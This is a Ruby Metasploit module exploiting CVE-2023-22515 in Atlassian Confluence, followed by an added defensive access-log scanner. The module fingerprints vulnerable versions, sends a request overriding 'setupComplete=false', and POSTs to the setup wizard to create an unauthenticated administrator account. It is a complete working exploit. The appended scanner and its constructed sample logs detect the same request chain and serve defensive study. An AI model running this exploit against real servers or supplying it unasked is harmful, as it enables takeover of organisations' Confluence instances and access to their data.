##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
        'Description' => %q{
          This module exploits a broken access control vulnerability in Atlassian Confluence servers
          leading to an authentication bypass. A specially crafted request can create a new admin
          account without authentication on the target Atlassian server.
        },
        'Author' => [
          'Unknown', # exploited in the wild
          'Emir Polat' # metasploit module
        ],
        'References' => [
          ['CVE', '2023-22515'],
          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
        ],
        'DisclosureDate' => '2023-10-04',
        'DefaultOptions' => {
          'RPORT' => 8090
        },
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
    ])
  end

  # Fingerprint the Confluence version from the login page footer and compare it
  # against the affected ranges listed in the advisory.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.action')
    )

    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Safe unless res.code == 200

    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
    return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/

    confluence_version = Rex::Version.new(Regexp.last_match(1))
    vprint_status("Detected Confluence version: #{confluence_version}")

    if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
    end

    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
  end

  def run
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
      'vars_get' => {
        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
      }
    )

    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200

    print_good('Found server-info.action! Trying to ignore setup.')

    created_user = create_admin_user

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      }
    )

    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user

    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200

    # Record the new account in the database so it shows up under `creds`.
    create_credential({
      workspace_id: myworkspace_id,
      origin_type: :service,
      module_fullname: fullname,
      username: datastore['NEW_USERNAME'],
      private_type: :password,
      private_data: datastore['NEW_PASSWORD'],
      service_name: 'Atlassian Confluence',
      address: datastore['RHOST'],
      port: datastore['RPORT'],
      protocol: 'tcp',
      status: Metasploit::Model::Login::Status::UNTRIED
    })

    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
    print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
  end

  def create_admin_user
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      },
      'vars_post' => {
        'username' => datastore['NEW_USERNAME'],
        'fullName' => 'New Admin',
        'email' => datastore['NEW_EMAIL'],
        'password' => datastore['NEW_PASSWORD'],
        'confirm' => datastore['NEW_PASSWORD'],
        'setup-next-button' => 'Next'
      }
    )

    res&.code == 302
  end
end
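The module's `Notes` declare `IOC_IN_LOGS`, and the three requests it sends are visible in the web server's access log: a request carrying the `bootstrapStatusProvider.applicationConfig.setupComplete=false` parameter, followed by POSTs to `/setup/setupadministrator.action` and `/setup/finishsetup.action` on an instance whose setup finished long ago. The following scanner is an added example for defenders and is not part of the Metasploit module or the Rapid7 framework. It assumes NCSA common-log-format lines (as written by Tomcat's AccessLogValve or a reverse proxy); the sample lines, addresses and timestamps are constructed for the example, and the request paths are the ones the module above uses.

```ruby
require 'uri'
require 'cgi'

# Constructed sample lines in NCSA common log format (addresses, times and
# user-agents are invented for this example).
SAMPLE_ACCESS_LOG = <<~LOG
  203.0.113.5 - - [05/Oct/2023:10:12:01 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.5 - - [05/Oct/2023:10:12:02 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  203.0.113.5 - - [05/Oct/2023:10:12:03 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  203.0.113.5 - - [05/Oct/2023:10:12:04 +0000] "POST /setup/finishsetup.action HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
  198.51.100.7 - - [05/Oct/2023:10:15:00 +0000] "GET /dashboard.action HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
  198.51.100.7 - - [05/Oct/2023:10:15:05 +0000] "GET /server-info.action HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
  not a log line at all
LOG

# Request line of the common log format; everything after the status code is ignored.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+)[^"]*" (?<status>\d{3})/

# Query parameter the module sends to make Confluence believe setup has not finished.
SETUP_COMPLETE_PARAM = 'bootstrapStatusProvider.applicationConfig.setupComplete'.freeze
# Setup wizard actions that should never be requested once an instance is configured.
SETUP_ACTIONS = %w[/setup/setupadministrator.action /setup/finishsetup.action].freeze

Finding = Struct.new(:ip, :time, :severity, :reason, :path)

# Parse one access-log line into a hash; returns nil for lines that do not match.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m

  uri = begin
    URI.parse(m[:target])
  rescue URI::InvalidURIError
    return nil
  end
  params = uri.query ? CGI.parse(uri.query) : {}
  { ip: m[:ip], time: m[:time], method: m[:method], path: uri.path.to_s,
    params: params, status: m[:status].to_i }
end

# Scan a whole log and return findings in log order. A request carrying the
# setupComplete override is flagged on its own; a later setup-wizard request from
# the same client is escalated to high severity because it matches the full chain.
# The path check uses end_with? so a context path such as /confluence still matches.
def scan_access_log(log_text)
  findings = []
  override_seen = Hash.new(false) # client IP => saw the setupComplete override

  log_text.each_line do |raw|
    req = parse_line(raw.strip)
    next unless req

    if req[:params].fetch(SETUP_COMPLETE_PARAM, []).include?('false')
      override_seen[req[:ip]] = true
      findings << Finding.new(req[:ip], req[:time], :medium,
                              'setupComplete override parameter in request', req[:path])
    end

    if SETUP_ACTIONS.any? { |a| req[:path].end_with?(a) }
      severity = override_seen[req[:ip]] ? :high : :low
      findings << Finding.new(req[:ip], req[:time], severity,
                              'setup wizard action requested on configured instance', req[:path])
    end
  end

  findings
end

# Print the findings for the constructed sample when run directly.
if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_ACCESS_LOG).each do |f|
    puts "#{f.severity.to_s.upcase.ljust(6)} #{f.ip} #{f.time} #{f.path}: #{f.reason}"
  end
end
```

On the sample log this yields one medium finding for the override request and two high findings for the setup-wizard POSTs that follow it from the same client; the plain `/server-info.action` request from the second client produces nothing, since the parameter, not the path, is the signal. A setup-action request without a preceding override is still reported at low severity because those endpoints have no legitimate use after installation. Feed it real logs with `scan_access_log(File.read(path))`.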